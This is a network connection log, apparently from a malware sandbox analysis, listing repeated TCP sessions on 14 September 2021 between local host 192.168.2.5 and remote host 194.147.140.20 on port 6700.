Sep 14, 2021 21:25:12.143429995 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143481970 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.182395935 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.182498932 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.182593107 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.317415953 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317445040 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317495108 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317627907 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317672968 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.317701101 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317780018 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.317826033 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317907095 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.317919970 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.317940950 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318051100 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318059921 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318159103 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318232059 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318331957 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318348885 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318409920 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318507910 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318576097 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318645000 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318682909 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318779945 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318825960 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318845034 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318860054 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318922043 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.318924904 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.318996906 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319025040 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319072962 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.319078922 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319156885 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.319247007 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319277048 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319380999 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.319591045 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319663048 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.319734097 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.319861889 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320010900 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320065022 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320082903 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.320230961 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320278883 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320302010 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.320338964 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320409060 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.320457935 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320543051 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320604086 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.320673943 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320785999 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.320857048 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.329242945 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330004930 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330041885 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330092907 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.330113888 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330210924 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.330413103 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330475092 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330512047 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330547094 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.330555916 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330621004 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.330627918 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330741882 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330810070 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.330858946 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330912113 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.330976009 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331037998 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331168890 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331202030 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331264973 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331373930 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331399918 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331444025 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331604958 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331629038 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331676006 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331681967 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331722021 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331757069 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331873894 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331902027 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331924915 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331969976 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.331949949 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.331999063 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.332084894 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.332170010 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.332179070 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.372134924 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.988528967 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.246217012 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.433084011 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:17.433196068 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.454498053 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.650439978 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:17.657833099 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.844228983 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:17.888230085 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:17.891567945 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:18.128276110 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:18.128427029 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:18.319808960 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:18.372761011 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:18.562868118 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:18.569026947 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:18.815654039 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:18.815764904 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:19.002367020 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:19.044605017 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:19.089570045 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:19.235217094 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:19.278997898 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:19.331386089 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:19.331501007 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:19.565752983 CEST	6700	49696	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:20.126526117 CEST	49696	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:24.492176056 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:24.678340912 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:24.678550959 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:24.679676056 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:24.877500057 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:24.878026009 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.066071033 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.086658001 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.315869093 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.316046000 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.429218054 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.482669115 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.503218889 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.503503084 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.668622017 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.717056036 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:25.863053083 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:25.863183975 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:26.049806118 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:26.092065096 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:26.108716011 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:26.278203964 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:26.326421976 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:26.346955061 CEST	6700	49697	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:27.123991013 CEST	49697	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:31.324265957 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:31.510839939 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:31.510974884 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:31.518148899 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:31.714277983 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:31.724510908 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:31.910693884 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:31.913259029 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:32.159365892 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:32.202688932 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:32.240010977 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:32.295814037 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:32.389951944 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:32.390105963 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:32.628393888 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:32.628624916 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:32.814631939 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:32.858411074 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:33.045088053 CEST	6700	49698	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:33.092663050 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:33.436304092 CEST	49698	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:37.526171923 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:37.712358952 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:37.712487936 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:37.763046026 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:37.968817949 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.011392117 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.197582960 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.207772970 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.450134993 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.468930006 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.564907074 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.608943939 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.656771898 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.657213926 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.796544075 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.843185902 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:38.886940002 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:38.887072086 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:39.073597908 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:39.124572992 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:39.311467886 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:39.358973980 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:39.488337994 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:39.730703115 CEST	6700	49699	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:40.469458103 CEST	49699	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:44.729372025 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:44.916441917 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:44.916651011 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:44.926899910 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:45.127391100 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:45.127919912 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:45.315340996 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:45.316854954 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:45.550115108 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:45.550204992 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:45.677608967 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:45.734515905 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:45.736325026 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:45.736485958 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:46.050637960 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:46.050841093 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:46.237375021 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:46.281349897 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:46.454339981 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:46.467458010 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:46.515700102 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:46.800400972 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:47.003299952 CEST	6700	49700	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:47.003498077 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:47.455147982 CEST	49700	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:51.584765911 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:51.770895958 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:51.771061897 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:51.820324898 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:52.024173021 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.027195930 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:52.214845896 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.264776945 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:52.503343105 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.503875017 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:52.677962065 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.691874027 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.693439007 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:52.879539967 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:52.880724907 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:53.067070961 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:53.067318916 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:53.255212069 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:53.297487974 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:53.490888119 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:53.716087103 CEST	6700	49701	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:53.766490936 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:54.454880953 CEST	49701	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:58.588745117 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:58.776501894 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:58.776671886 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:58.777549028 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:58.976455927 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:59.016161919 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:59.202620983 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:59.211821079 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:59.453429937 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:59.564412117 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:59.581665039 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:59.626154900 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:59.750669003 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:59.775984049 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:00.015758038 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:00.015842915 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:00.202179909 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:00.202346087 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:00.388629913 CEST	6700	49702	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:00.438711882 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:00.686722994 CEST	49702	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:04.917380095 CEST	49703	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:05.105072975 CEST	6700	49703	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:05.105341911 CEST	49703	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:05.105993986 CEST	49703	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:05.293070078 CEST	6700	49703	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:09.458893061 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:09.644819975 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:09.645121098 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:09.645778894 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:09.842277050 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:09.842756987 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:10.029428959 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:10.029652119 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:10.267690897 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:10.268138885 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:10.517198086 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:10.817293882 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:10.819024086 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:11.005218029 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:11.005471945 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:11.191289902 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:11.233592033 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:11.420742989 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:11.423293114 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:11.609599113 CEST	6700	49704	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:11.656178951 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:11.912218094 CEST	49704	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:16.025970936 CEST	49705	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:16.211895943 CEST	6700	49705	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:16.212141037 CEST	49705	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:16.232585907 CEST	49705	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:16.419857025 CEST	6700	49705	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:20.730140924 CEST	49706	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:20.916937113 CEST	6700	49706	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:20.917061090 CEST	49706	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:20.993282080 CEST	49706	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:21.179653883 CEST	6700	49706	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:25.336801052 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:25.522718906 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:25.522948980 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:25.632462025 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:25.829247952 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:25.829389095 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:26.298007965 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:26.484147072 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:26.485353947 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:26.838710070 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:26.838831902 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:27.024825096 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:27.024962902 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:27.274100065 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:27.274315119 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:27.460627079 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:27.503597021 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:27.690404892 CEST	6700	49707	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:27.736145973 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:27.752193928 CEST	49707	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:31.969939947 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.156347990 CEST	6700	49708	194.147.140.20	192.168.2.5
